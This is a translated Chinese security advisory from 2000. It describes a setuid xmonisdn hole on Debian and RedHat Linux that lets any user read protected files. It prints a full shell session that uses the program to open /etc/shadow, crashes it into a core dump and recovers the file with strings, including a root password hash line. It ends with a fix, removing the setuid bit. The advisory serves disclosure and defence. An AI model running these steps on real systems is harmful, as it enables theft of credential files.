发信人: hacked() 
整理人: (2000-03-07 19:03:31), 站内信件
 | 
 
 
105 网 络 安 全 中 心  HTTP://WWW.CN105.COM   本文由105成员:XUNDI翻译 
 
 回上页
 
 漏洞名称:在isdn4k-utils包中XmonISDN允许用户访问任何文件
 
 漏洞说明:xmonisdn是Debian GNU/linux和REDHAT6.1自带的ISDN工具包中的程序 ,xmonisdn是一个Xwindow applet是用来监控你的isdn连接状态的工具,你可以 特定一个你不能访问的文件(如/etc/shadow)尝试让xmonisdn来打开,然后使用k ill -8杀掉进程。xmonisdn会在CORE文件中产生文件碎片,然后你使用strings来 查看CORE文件,那个不能访问的文件会显示在屏幕上。
 
 影响范围:Debian Linux 2.2   RedHat Linux 6.1;6.0 
 
 漏洞特征:
 [syntonix@damien bin]# pwd; ls -al xmonisdn 
 /usr/bin 
 -rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn 
 [syntonix@damien bin]# xmonisdn -file /etc/shadow 
 Warning: Cannot convert string "netactive" to type Pixmap 
 Warning: Cannot convert string "netactiveout" to type Pixmap 
 Warning: Cannot convert string "netwaiting" to type Pixmap 
 Warning: Cannot convert string "netinactive" to type Pixmap 
 Warning: Cannot convert string "netstart" to type Pixmap 
 Warning: Cannot convert string "netstop" to type Pixmap 
 [1]+ Stopped xmonisdn -file /etc/shadow 
 [syntonix@damien bin]# bg 
 [1]+ xmonisdn -file /etc/shadow & 
 [syntonix@damien bin]# killall -8 xmonisdn 
 [1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow  
 [syntonix@damien bin]# strings core|less 
 
 /lib/ld-linux.so.2 
 root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:13453850 0 
 bin:*:10878:0:99999:7::: 
 daemon:*:10878:0:99999:7::: 
 adm:*:10878:0:99999:7::: 
 lp:*:10878:0:99999:7::: 
 ... 
 
 解决方法:
 临时处理方法,使用chmod a-s消除setuid位。
 
 
 本文由 105网络安全中心 成员翻译
 如要转载请注名文章来源,并保持其完整
 
 在您遨游网际的时候,105将为您保驾护航             回上页
  -- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.149.149]
  | 
 
 
 |